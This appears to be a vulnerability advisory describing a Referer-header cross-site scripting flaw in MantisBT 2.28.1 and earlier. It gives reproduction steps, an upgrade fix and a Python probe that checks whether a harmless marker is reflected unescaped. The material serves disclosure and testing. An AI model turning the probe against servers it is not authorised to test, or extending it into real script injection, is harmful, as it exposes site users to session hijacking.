Mantis Bug Tracker Cross-Site Scripting Vulnerability via Improper HTML Escaping

Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in Mantis Bug Tracker (MantisBT) versions 2.28.1 and prior. The affected page takes its redirection target (the page to return to) from the request's Referer header and writes it into the response without HTML-escaping it, so whoever controls that header value can inject HTML into the page. Modern browsers percent-encode special characters before sending the Referer header, so a victim's own browser will not normally deliver raw HTML there; the injection becomes exploitable as a reflected XSS when a raw-HTTP client supplies the header, or when certain server configurations allow the resulting response to be cached and served to other users (cache poisoning).

Impact

Exploitation of this vulnerability allows cross-site scripting: the injected HTML (including script) is rendered and executed in the victim's browser in the context of the MantisBT site and session.

Reproduction

To reproduce this vulnerability, log in as an administrator and navigate to the tag update page, creating a new tag first if none exists. Then send a request to the tag update page with a crafted Referer header containing unencoded HTML. The request must be sent with a client that does not percent-encode the header (a raw HTTP client rather than a browser, which would encode the special characters). The injected HTML is reflected unescaped in the response, demonstrating the vulnerability.
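The following Python script is an added example written for this page; it is not MantisBT code and does not use any MantisBT internals. It models the flaw and the fix described above and gives a way to check a live instance. render_redirect_link is a constructed stand-in for a page that echoes the Referer value back into a link (unescaped, as in the vulnerable behaviour, or HTML-escaped, as in the corrected behaviour); classify_reflection decides whether a response body reflects the probe marker raw, entity-encoded, or not at all; raw_referer and browser_style_referer show why a browser-sent header is inert while a raw client's is not. probe sends one authenticated request to a URL, cookie, and base Referer that the tester supplies; the host name in demo is a placeholder, and the page path is assumed.

```python
"""Probe for unescaped reflection of the Referer header (added example, not MantisBT code)."""
import html
import urllib.parse
import urllib.request

# Harmless marker: visible as live markup if reflected raw, inert text if escaped.
MARKER = '<b id="referer-probe">probe</b>'


def browser_style_referer(base, marker=MARKER):
    """What a modern browser actually sends: special characters percent-encoded."""
    return base + "?r=" + urllib.parse.quote(marker, safe="")


def raw_referer(base, marker=MARKER):
    """What a non-browser client (or a poisoned cache) can deliver: the marker byte-for-byte."""
    return base + "?r=" + marker


def classify_reflection(body, marker=MARKER):
    """'raw' if the marker appears as live HTML (vulnerable), 'escaped' if only the
    entity-encoded form appears (fixed), 'absent' if neither shows up."""
    if marker in body:
        return "raw"
    if html.escape(marker, quote=True) in body or html.escape(marker, quote=False) in body:
        return "escaped"
    return "absent"


def render_redirect_link(referer, escaped):
    """Constructed stand-in for a page that links back to the Referer value.
    escaped=False mirrors the flaw the advisory describes; escaped=True the corrected output.
    This is not MantisBT's template code."""
    value = html.escape(referer, quote=True) if escaped else referer
    return '<p><a href="%s">Back</a></p>' % value


def probe(url, cookie, base_referer, timeout=10):
    """Send one authenticated request with a raw marker in Referer and classify the reflection.
    url, cookie and base_referer are supplied by the tester; nothing is hard-coded to a real host."""
    req = urllib.request.Request(
        url, headers={"Referer": raw_referer(base_referer), "Cookie": cookie}
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return classify_reflection(body)


def demo():
    """Offline walk-through of the three cases; host and path are placeholders, not real endpoints."""
    base = "https://tracker.example/tag-update-page"  # assumed location of the tag update page
    return {
        # unescaped output + raw client: marker lands as live HTML
        "vulnerable_raw_client": classify_reflection(
            render_redirect_link(raw_referer(base), escaped=False)),
        # unescaped output + browser client: header is percent-encoded, so nothing injectable arrives
        "vulnerable_browser_client": classify_reflection(
            render_redirect_link(browser_style_referer(base), escaped=False)),
        # escaped output + raw client: marker is reflected only as entities
        "fixed_raw_client": classify_reflection(
            render_redirect_link(raw_referer(base), escaped=True)),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, "->", verdict)
```

Against a real instance, call probe with the tag update page URL, a valid administrator session cookie, and a plausible base Referer; a verdict of "raw" reproduces the advisory, "escaped" is the 2.28.2+ behaviour. The "vulnerable_browser_client" case is the reason the advisory qualifies exploitability: with the same unescaped server output, a browser-sent Referer carries no usable markup, which is why a raw client or a cache-poisoning path is needed.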

Remediation

Upgrade to MantisBT version 2.28.2 or later, where this vulnerability has been fixed.

Added: May 26, 2026, 2:43 PM
Updated: May 26, 2026, 2:43 PM

Vulnerability Rating

Custom Algorithm
spread: 5.0
impact: 1.7
exploitability: 7.3
remediation: 7.7
relevance: 9.1
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.